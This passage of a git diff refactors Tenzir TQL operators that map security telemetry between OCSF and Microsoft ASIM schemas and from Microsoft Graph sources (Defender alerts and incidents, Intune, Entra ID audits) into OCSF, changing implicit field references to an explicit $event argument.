-asim.EventResultDetails = ocsf.http_response?.code?.string() else ocsf.status_code?.string() -if ocsf.http_response?.code? != null { - asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" +$event.asim.EventSchema = "WebSession" +$event.asim.EventSchemaVersion = "0.2.7" +$event.asim.EventType = "HTTPsession" +$event.asim.Url = $event.ocsf.http_request?.url?.url_string? +$event.asim.HttpRequestMethod = $event.ocsf.http_request?.http_method? else $event.ocsf.activity_name?.to_upper() +$event.asim.EventResultDetails = $event.ocsf.http_response?.code?.string() else $event.ocsf.status_code?.string() +if $event.ocsf.http_response?.code? != null { + $event.asim.EventResult = "Success" if $event.ocsf.http_response.code < 400 else "Failure" } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 72f855a..e2d16bc 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -7,36 +7,36 @@ args: type: field --- -assert $event.class_uid == 4001 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 4001 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.network_session" -asim.EventSchema = "NetworkSession" -asim.EventSchemaVersion = "0.2.7" -asim.EventType = "NetworkSession" -asim.EventType = "Flow" if ocsf.activity_name == "Traffic" else asim.EventType -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcHostname = ocsf.src_endpoint?.hostname? -asim.SrcPortNumber = ocsf.src_endpoint?.port? -asim.DstIpAddr = ocsf.dst_endpoint?.ip? -asim.DstHostname = ocsf.dst_endpoint?.hostname? -asim.DstPortNumber = ocsf.dst_endpoint?.port? -asim.SrcBytes = ocsf.traffic?.bytes_out? -asim.DstBytes = ocsf.traffic?.bytes_in? -match ocsf.disposition? { +$event.asim.EventSchema = "NetworkSession" +$event.asim.EventSchemaVersion = "0.2.7" +$event.asim.EventType = "NetworkSession" +$event.asim.EventType = "Flow" if $event.ocsf.activity_name == "Traffic" else $event.asim.EventType +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? +$event.asim.SrcPortNumber = $event.ocsf.src_endpoint?.port? +$event.asim.DstIpAddr = $event.ocsf.dst_endpoint?.ip? +$event.asim.DstHostname = $event.ocsf.dst_endpoint?.hostname? +$event.asim.DstPortNumber = $event.ocsf.dst_endpoint?.port? +$event.asim.SrcBytes = $event.ocsf.traffic?.bytes_out? +$event.asim.DstBytes = $event.ocsf.traffic?.bytes_in? +match $event.ocsf.disposition? { "Allowed" => { - asim.DvcAction = "Allow" - asim.EventResult = "Success" + $event.asim.DvcAction = "Allow" + $event.asim.EventResult = "Success" } "Blocked" | "Denied" => { - asim.DvcAction = "Deny" - asim.EventResult = "Failure" - asim.EventSeverity = asim.EventSeverity? else "Low" + $event.asim.DvcAction = "Deny" + $event.asim.EventResult = "Failure" + $event.asim.EventSeverity = $event.asim.EventSeverity? else "Low" } _ => {} } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index bfb9786..08d77b4 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -7,32 +7,32 @@ args: type: field --- -assert $event.class_uid == 1007 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 1007 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.process_event" -asim.EventSchema = "ProcessEvent" -asim.EventSchemaVersion = "0.1.4" -match ocsf.activity_name { - "Launch" => { asim.EventType = "ProcessCreated" } - "Terminate" => { asim.EventType = "ProcessTerminated" } +$event.asim.EventSchema = "ProcessEvent" +$event.asim.EventSchemaVersion = "0.1.4" +match $event.ocsf.activity_name { + "Launch" => { $event.asim.EventType = "ProcessCreated"} + "Terminate" => { $event.asim.EventType = "ProcessTerminated"} _ => {} } -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.ActingProcessId = ocsf.actor?.process?.pid?.string() else ocsf.process?.parent_process?.pid?.string() else ocsf.process?.pid?.string() -asim.ParentProcessId = ocsf.actor?.process?.parent_process?.pid?.string() -asim.TargetProcessId = ocsf.process?.pid?.string() -asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else ocsf.process?.path?.split("\\")[-1] -asim.TargetProcessCommandLine = ocsf.process?.cmd_line? -asim.TargetUserId = ocsf.user?.uid? +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.ActingProcessId = $event.ocsf.actor?.process?.pid?.string() else $event.ocsf.process?.parent_process?.pid?.string() else $event.ocsf.process?.pid?.string() +$event.asim.ParentProcessId = $event.ocsf.actor?.process?.parent_process?.pid?.string() +$event.asim.TargetProcessId = $event.ocsf.process?.pid?.string() +$event.asim.TargetProcessName = $event.ocsf.process?.name? else $event.ocsf.process?.file?.name? else $event.ocsf.process?.path?.split("\\")[-1] +$event.asim.TargetProcessCommandLine = $event.ocsf.process?.cmd_line? +$event.asim.TargetUserId = $event.ocsf.user?.uid? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 4f93119..a0bcead 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -7,42 +7,42 @@ args: type: field --- -assert $event.class_uid == 1006 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 1006 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.audit_event" -asim.EventSchema = "AuditEvent" -asim.EventSchemaVersion = "0.1.2" -asim.EventType = "Other" -match ocsf.activity_name { - "Create" => { asim.EventType = "Create" } - "Read" => { asim.EventType = "Read" } - "Update" | "Set" => { asim.EventType = "Set" } - "Delete" => { asim.EventType = "Delete" } - "Execute" => { asim.EventType = "Execute" } - "Install" => { asim.EventType = "Install" } - "Clear" => { asim.EventType = "Clear" } - "Enable" => { asim.EventType = "Enable" } - "Disable" => { asim.EventType = "Disable" } - "Start" => { asim.EventType = "Start" } - "Stop" => { asim.EventType = "Stop" } +$event.asim.EventSchema = "AuditEvent" +$event.asim.EventSchemaVersion = "0.1.2" +$event.asim.EventType = "Other" +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "Create"} + "Read" => { $event.asim.EventType = "Read"} + "Update" | "Set" => { $event.asim.EventType = "Set"} + "Delete" => { $event.asim.EventType = "Delete"} + "Execute" => { $event.asim.EventType = "Execute"} + "Install" => { $event.asim.EventType = "Install"} + "Clear" => { $event.asim.EventType = "Clear"} + "Enable" => { $event.asim.EventType = "Enable"} + "Disable" => { $event.asim.EventType = "Disable"} + "Start" => { $event.asim.EventType = "Start"} + "Stop" => { $event.asim.EventType = "Stop"} _ => {} } -asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType -asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -asim.ObjectType = "Scheduled Task" -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.Operation = $event.ocsf.activity_name? else $event.ocsf.type_name? else $event.asim.EventType +$event.asim.Object = $event.ocsf.job?.name? else $event.ocsf.log_name? else $event.ocsf.metadata?.log_name? else $event.ocsf.entity?.name? else $event.ocsf.entity?.uid? else $event.ocsf.win_service?.name? else $event.ocsf.win_service?.service_file?.path? +$event.asim.ObjectType = "Scheduled Task" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? -asim.TargetIpAddr = ocsf.dst_endpoint?.ip? +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? +$event.asim.TargetIpAddr = $event.ocsf.dst_endpoint?.ip? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 333b731..5069b57 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -7,42 +7,42 @@ args: type: field --- -assert $event.class_uid == 201004 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 201004 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.audit_event" -asim.EventSchema = "AuditEvent" -asim.EventSchemaVersion = "0.1.2" -asim.EventType = "Other" -match ocsf.activity_name { - "Create" => { asim.EventType = "Create" } - "Read" => { asim.EventType = "Read" } - "Update" | "Set" => { asim.EventType = "Set" } - "Delete" => { asim.EventType = "Delete" } - "Execute" => { asim.EventType = "Execute" } - "Install" => { asim.EventType = "Install" } - "Clear" => { asim.EventType = "Clear" } - "Enable" => { asim.EventType = "Enable" } - "Disable" => { asim.EventType = "Disable" } - "Start" => { asim.EventType = "Start" } - "Stop" => { asim.EventType = "Stop" } +$event.asim.EventSchema = "AuditEvent" +$event.asim.EventSchemaVersion = "0.1.2" +$event.asim.EventType = "Other" +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "Create"} + "Read" => { $event.asim.EventType = "Read"} + "Update" | "Set" => { $event.asim.EventType = "Set"} + "Delete" => { $event.asim.EventType = "Delete"} + "Execute" => { $event.asim.EventType = "Execute"} + "Install" => { $event.asim.EventType = "Install"} + "Clear" => { $event.asim.EventType = "Clear"} + "Enable" => { $event.asim.EventType = "Enable"} + "Disable" => { $event.asim.EventType = "Disable"} + "Start" => { $event.asim.EventType = "Start"} + "Stop" => { $event.asim.EventType = "Stop"} _ => {} } -asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType -asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -asim.ObjectType = "Service" -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.Operation = $event.ocsf.activity_name? else $event.ocsf.type_name? else $event.asim.EventType +$event.asim.Object = $event.ocsf.job?.name? else $event.ocsf.log_name? else $event.ocsf.metadata?.log_name? else $event.ocsf.entity?.name? else $event.ocsf.entity?.uid? else $event.ocsf.win_service?.name? else $event.ocsf.win_service?.service_file?.path? +$event.asim.ObjectType = "Service" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? -asim.TargetIpAddr = ocsf.dst_endpoint?.ip? +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? +$event.asim.TargetIpAddr = $event.ocsf.dst_endpoint?.ip? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/graph/ocsf/base.tql b/microsoft/operators/graph/ocsf/base.tql index fa1d481..34e349b 100644 --- a/microsoft/operators/graph/ocsf/base.tql +++ b/microsoft/operators/graph/ocsf/base.tql @@ -1,12 +1,17 @@ --- description: Microsoft Graph → OCSF Base Event (0) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.base_event" -ocsf.category_uid = 0 -ocsf.class_uid = 0 -ocsf.activity_id = 0 -ocsf.type_uid = 0 -ocsf.severity_id = 0 -ocsf.time = now() +$event.ocsf.category_uid = 0 +$event.ocsf.class_uid = 0 +$event.ocsf.activity_id = 0 +$event.ocsf.type_uid = 0 +$event.ocsf.severity_id = 0 +$event.ocsf.time = now() diff --git a/microsoft/operators/graph/ocsf/events/compliance_policy_setting_state_summary.tql b/microsoft/operators/graph/ocsf/events/compliance_policy_setting_state_summary.tql index 03cd1f4..feed73a 100644 --- a/microsoft/operators/graph/ocsf/events/compliance_policy_setting_state_summary.tql +++ b/microsoft/operators/graph/ocsf/events/compliance_policy_setting_state_summary.tql @@ -1,43 +1,48 @@ --- description: Microsoft Intune compliance summary → OCSF Compliance Finding (2003) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.compliance_finding" -ocsf.metadata.product.name = "Microsoft Intune" -ocsf.metadata.log_name = "deviceManagement/deviceCompliancePolicySettingStateSummaries" -ocsf.metadata.profiles = ["cloud", "security_control"] - -ocsf.category_uid = 2 -ocsf.class_uid = 2003 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.time = now() - -ocsf.severity_id = 1 -ocsf.status_id = 4 -if graph.nonCompliantDeviceCount > 0 or graph.errorDeviceCount > 0 { - ocsf.severity_id = 3 - ocsf.status_id = 1 +$event.ocsf.metadata.product.name = "Microsoft Intune" +$event.ocsf.metadata.log_name = "deviceManagement/deviceCompliancePolicySettingStateSummaries" +$event.ocsf.metadata.profiles = ["cloud", "security_control"] + +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2003 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.time = now() + +$event.ocsf.severity_id = 1 +$event.ocsf.status_id = 4 +if $event.graph.nonCompliantDeviceCount > 0 or $event.graph.errorDeviceCount > 0 { + $event.ocsf.severity_id = 3 + $event.ocsf.status_id = 1 } -ocsf.finding_info = { - uid: ocsf.metadata.original_event_uid, - title: move graph.settingName?, - desc: move graph.setting?, +$event.ocsf.finding_info = { + uid: $event.ocsf.metadata.original_event_uid, + title: move $event.graph.settingName?, + desc: move $event.graph.setting?, } -ocsf.compliance = { - control: ocsf.finding_info.title, +$event.ocsf.compliance = { + control: $event.ocsf.finding_info.title, status_id: 1, } -if ocsf.severity_id == 3 { - ocsf.compliance.status_id = 3 +if $event.ocsf.severity_id == 3 { + $event.ocsf.compliance.status_id = 3 } -ocsf.resources = [{ +$event.ocsf.resources = [{ name: "Microsoft Intune managed devices", - type: move graph.platformType?, + type: move $event.graph.platformType?, role_id: 1, }] diff --git a/microsoft/operators/graph/ocsf/events/defender_alert.tql b/microsoft/operators/graph/ocsf/events/defender_alert.tql index 7d79bbf..ae83654 100644 --- a/microsoft/operators/graph/ocsf/events/defender_alert.tql +++ b/microsoft/operators/graph/ocsf/events/defender_alert.tql @@ -1,19 +1,24 @@ --- description: Microsoft Defender alert → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.metadata.product.name = "Microsoft Defender" -ocsf.metadata.log_name = "security/alerts_v2" -ocsf.metadata.profiles = ["cloud", "incident", "security_control"] +$event.ocsf.metadata.product.name = "Microsoft Defender" +$event.ocsf.metadata.log_name = "security/alerts_v2" +$event.ocsf.metadata.profiles = ["cloud", "incident", "security_control"] -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.time = time(move graph.createdDateTime) -ocsf.end_time = time(move graph.lastUpdateDateTime?) +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.time = time(move $event.graph.createdDateTime) +$event.ocsf.end_time = time(move $event.graph.lastUpdateDateTime?) let $severities = { informational: 1, @@ -21,17 +26,17 @@ let $severities = { medium: 3, high: 4, } -ocsf.severity_id = $severities[graph.severity]? else 0 -drop graph.severity? +$event.ocsf.severity_id = $severities[$event.graph.severity]? else 0 +drop $event.graph.severity? let $statuses = { new: 1, inProgress: 2, resolved: 4, } -ocsf.status_id = $statuses[graph.status]? -if ocsf.status_id != null { - drop graph.status? +$event.ocsf.status_id = $statuses[$event.graph.status]? +if $event.ocsf.status_id != null { + drop $event.graph.status? } let $verdicts = { @@ -40,61 +45,61 @@ let $verdicts = { truePositive: 2, informationalExpectedActivity: 5, } -ocsf.verdict_id = $verdicts[graph.classification?]? -if ocsf.verdict_id != null { - drop graph.classification? +$event.ocsf.verdict_id = $verdicts[$event.graph.classification?]? +if $event.ocsf.verdict_id != null { + drop $event.graph.classification? } -match graph.determination { +match $event.graph.determination { "unknown" | "unknownFutureValue" => {} - _ if graph.determination? != null => { - graph._finding_types = { - types: [move graph.determination], + _ if $event.graph.determination? != null => { + $event.graph._finding_types = { + types: [move $event.graph.determination], } } _ => {} } -ocsf.finding_info = { - uid: ocsf.metadata.original_event_uid, - uid_alt: move graph.providerAlertId?, - title: move graph.title?, - desc: move graph.description?, - modified_time: ocsf.end_time, +$event.ocsf.finding_info = { + uid: $event.ocsf.metadata.original_event_uid, + uid_alt: move $event.graph.providerAlertId?, + title: move $event.graph.title?, + desc: move $event.graph.description?, + modified_time: $event.ocsf.end_time, product: { - name: move graph.serviceSource?, + name: move $event.graph.serviceSource?, vendor_name: "Microsoft", feature: { - name: move graph.detectionSource?, + name: move $event.graph.detectionSource?, }, }, related_events: [{ - uid: move graph.incidentId?, + uid: move $event.graph.incidentId?, }], - ...move graph._finding_types?, + ...move $event.graph._finding_types?, } -if graph.detectorId? != null { - ocsf.finding_info.analytic = { - uid: move graph.detectorId, +if $event.graph.detectorId? != null { + $event.ocsf.finding_info.analytic = { + uid: move $event.graph.detectorId, type_id: 0, } } -if graph.mitreTechniques? != null { - ocsf.attacks = graph.mitreTechniques.map(t => { +if $event.graph.mitreTechniques? != null { + $event.ocsf.attacks = $event.graph.mitreTechniques.map(t => { technique: { uid: t, }, }) - drop graph.mitreTechniques + drop $event.graph.mitreTechniques } -if graph.evidence? != null { - ocsf.evidences = graph.evidence.map(e => { +if $event.graph.evidence? != null { + $event.ocsf.evidences = $event.graph.evidence.map(e => { name: e["@odata.type"]?, data: e, }) - drop graph.evidence + drop $event.graph.evidence } -ocsf.is_alert = true +$event.ocsf.is_alert = true diff --git a/microsoft/operators/graph/ocsf/events/defender_incident.tql b/microsoft/operators/graph/ocsf/events/defender_incident.tql index df8ac70..7da3690 100644 --- a/microsoft/operators/graph/ocsf/events/defender_incident.tql +++ b/microsoft/operators/graph/ocsf/events/defender_incident.tql @@ -1,49 +1,54 @@ --- description: Microsoft Defender incident → OCSF Incident Finding (2005) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.incident_finding" -ocsf.metadata.product.name = "Microsoft Defender" -ocsf.metadata.log_name = "security/incidents" -ocsf.metadata.profiles = ["cloud", "incident", "security_control"] +$event.ocsf.metadata.product.name = "Microsoft Defender" +$event.ocsf.metadata.log_name = "security/incidents" +$event.ocsf.metadata.profiles = ["cloud", "incident", "security_control"] -ocsf.category_uid = 2 -ocsf.class_uid = 2005 -ocsf.time = time(move graph.createdDateTime) -ocsf.end_time = time(move graph.lastUpdateDateTime?) +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2005 +$event.ocsf.time = time(move $event.graph.createdDateTime) +$event.ocsf.end_time = time(move $event.graph.lastUpdateDateTime?) -match graph.status { +match $event.graph.status { "active" | "new" => { - ocsf.status_id = 1 + $event.ocsf.status_id = 1 } "inProgress" => { - ocsf.status_id = 2 + $event.ocsf.status_id = 2 } "resolved" => { - ocsf.status_id = 4 + $event.ocsf.status_id = 4 } "redirected" => { - ocsf.status_id = 5 + $event.ocsf.status_id = 5 } _ => { - ocsf.status_id = 1 + $event.ocsf.status_id = 1 } } -drop graph.status? +drop $event.graph.status? -match ocsf.status_id { +match $event.ocsf.status_id { 4 | 5 => { - ocsf.activity_id = 3 // Close + $event.ocsf.activity_id = 3 // Close } - _ if ocsf.end_time != null and ocsf.end_time != ocsf.time => { - ocsf.activity_id = 2 // Update + _ if $event.ocsf.end_time != null and $event.ocsf.end_time != $event.ocsf.time => { + $event.ocsf.activity_id = 2 // Update } _ => { - ocsf.activity_id = 1 // Create + $event.ocsf.activity_id = 1 // Create } } -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id let $severities = { informational: 1, @@ -51,73 +56,73 @@ let $severities = { medium: 3, high: 4, } -ocsf.severity_id = $severities[graph.severity]? else 0 -drop graph.severity? +$event.ocsf.severity_id = $severities[$event.graph.severity]? else 0 +drop $event.graph.severity? -if graph.priorityScore? != null { - ocsf.risk_score = move graph.priorityScore - ocsf.priority_id = 1 - if ocsf.risk_score >= 15 { - ocsf.priority_id = 2 +if $event.graph.priorityScore? != null { + $event.ocsf.risk_score = move $event.graph.priorityScore + $event.ocsf.priority_id = 1 + if $event.ocsf.risk_score >= 15 { + $event.ocsf.priority_id = 2 } - if ocsf.risk_score > 85 { - ocsf.priority_id = 4 + if $event.ocsf.risk_score > 85 { + $event.ocsf.priority_id = 4 } } -if graph.customTags? != null or graph.systemTags? != null { - ocsf.metadata.labels = [ - ...move graph.customTags?, - ...move graph.systemTags?, +if $event.graph.customTags? != null or $event.graph.systemTags? != null { + $event.ocsf.metadata.labels = [ + ...move $event.graph.customTags?, + ...move $event.graph.systemTags?, ] - if ocsf.metadata.labels.length() == 0 { - drop ocsf.metadata.labels + if $event.ocsf.metadata.labels.length() == 0 { + drop $event.ocsf.metadata.labels } } -match graph.determination { +match $event.graph.determination { "unknown" | "unknownFutureValue" => {} - _ if graph.determination? != null => { - graph._finding_types = { - types: [move graph.determination], + _ if $event.graph.determination? != null => { + $event.graph._finding_types = { + types: [move $event.graph.determination], } } _ => {} } -if graph.redirectIncidentId? != null { - graph._related_events = { +if $event.graph.redirectIncidentId? != null { + $event.graph._related_events = { related_events: [{ - uid: move graph.redirectIncidentId, + uid: move $event.graph.redirectIncidentId, }], } } -ocsf.message = move graph.displayName? -ocsf.desc = move graph.description? -ocsf.finding_info_list = [ +$event.ocsf.message = move $event.graph.displayName? +$event.ocsf.desc = move $event.graph.description? +$event.ocsf.finding_info_list = [ { - uid: ocsf.metadata.original_event_uid, - title: ocsf.message, - desc: move graph.summary?, - ...move graph._finding_types?, - ...move graph._related_events?, + uid: $event.ocsf.metadata.original_event_uid, + title: $event.ocsf.message, + desc: move $event.graph.summary?, + ...move $event.graph._finding_types?, + ...move $event.graph._related_events?, }, ] -if graph.alerts? != null { - ocsf.finding_info_list = [ - ...ocsf.finding_info_list, - ...graph.alerts.map(a => { +if $event.graph.alerts? != null { + $event.ocsf.finding_info_list = [ + ...$event.ocsf.finding_info_list, + ...$event.graph.alerts.map(a => { uid: a.id, title: a.title, }), ] - drop graph.alerts + drop $event.graph.alerts } -if graph.assignedTo? != null { - ocsf.assignee = { - name: graph.assignedTo.split("@")[0]?, - domain: graph.assignedTo.split("@")[1]?, - email_addr: move graph.assignedTo, +if $event.graph.assignedTo? != null { + $event.ocsf.assignee = { + name: $event.graph.assignedTo.split("@")[0]?, + domain: $event.graph.assignedTo.split("@")[1]?, + email_addr: move $event.graph.assignedTo, type_id: 1, } } @@ -128,7 +133,7 @@ let $verdicts = { truePositive: 2, informationalExpectedActivity: 5, } -ocsf.verdict_id = $verdicts[graph.classification?]? -if ocsf.verdict_id != null { - drop graph.classification? +$event.ocsf.verdict_id = $verdicts[$event.graph.classification?]? +if $event.ocsf.verdict_id != null { + drop $event.graph.classification? } diff --git a/microsoft/operators/graph/ocsf/events/detected_app.tql b/microsoft/operators/graph/ocsf/events/detected_app.tql index fa0a435..f013764 100644 --- a/microsoft/operators/graph/ocsf/events/detected_app.tql +++ b/microsoft/operators/graph/ocsf/events/detected_app.tql @@ -1,35 +1,40 @@ --- description: Microsoft Intune detected app → OCSF Software Inventory Info (5020) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.software_info" -ocsf.metadata.product.name = "Microsoft Intune" -ocsf.metadata.log_name = "deviceManagement/detectedApps" -ocsf.metadata.profiles = ["cloud", "host"] +$event.ocsf.metadata.product.name = "Microsoft Intune" +$event.ocsf.metadata.log_name = "deviceManagement/detectedApps" +$event.ocsf.metadata.profiles = ["cloud", "host"] -ocsf.category_uid = 5 -ocsf.class_uid = 5020 -ocsf.activity_id = 2 // Collect -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.severity_id = 1 -ocsf.time = now() +$event.ocsf.category_uid = 5 +$event.ocsf.class_uid = 5020 +$event.ocsf.activity_id = 2 // Collect +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.severity_id = 1 +$event.ocsf.time = now() -ocsf.package = { - uid: ocsf.metadata.original_event_uid, - name: move graph.displayName, - version: move graph.version, - vendor_name: move graph.publisher?, +$event.ocsf.package = { + uid: $event.ocsf.metadata.original_event_uid, + name: move $event.graph.displayName, + version: move $event.graph.version, + vendor_name: move $event.graph.publisher?, type_id: 1, } -ocsf.product = { - name: ocsf.package.name, - vendor_name: ocsf.package.vendor_name, - version: ocsf.package.version, +$event.ocsf.product = { + name: $event.ocsf.package.name, + vendor_name: $event.ocsf.package.vendor_name, + version: $event.ocsf.package.version, } -ocsf.device = { +$event.ocsf.device = { name: "Microsoft Intune managed devices", type_id: 0, } diff --git a/microsoft/operators/graph/ocsf/events/directory_audit.tql b/microsoft/operators/graph/ocsf/events/directory_audit.tql index fccec0b..01cb4b5 100644 --- a/microsoft/operators/graph/ocsf/events/directory_audit.tql +++ b/microsoft/operators/graph/ocsf/events/directory_audit.tql @@ -1,49 +1,54 @@ --- description: Microsoft Entra ID directory audit log → OCSF IAM activity +args: + named: + - name: event + description: The working event to map. + type: field --- -ocsf.metadata.product.name = "Microsoft Entra ID" -ocsf.metadata.log_name = "auditLogs/directoryAudits" -ocsf.metadata.source = move graph.loggedByService? +$event.ocsf.metadata.product.name = "Microsoft Entra ID" +$event.ocsf.metadata.log_name = "auditLogs/directoryAudits" +$event.ocsf.metadata.source = move $event.graph.loggedByService? -ocsf.category_uid = 3 -ocsf.time = time(move graph.activityDateTime) -ocsf.message = move graph.activityDisplayName? -ocsf.status_detail = move graph.resultReason? +$event.ocsf.category_uid = 3 +$event.ocsf.time = time(move $event.graph.activityDateTime) +$event.ocsf.message = move $event.graph.activityDisplayName? +$event.ocsf.status_detail = move $event.graph.resultReason? let $status_ids = { success: 1, } -ocsf.status_id = $status_ids[graph.result]? else 2 -if ocsf.status_id == 2 { - ocsf.severity_id = 2 +$event.ocsf.status_id = $status_ids[$event.graph.result]? else 2 +if $event.ocsf.status_id == 2 { + $event.ocsf.severity_id = 2 } -drop graph.result? +drop $event.graph.result? -if graph.initiatedBy.user? != null { - ocsf.actor = { +if $event.graph.initiatedBy.user? != null { + $event.ocsf.actor = { 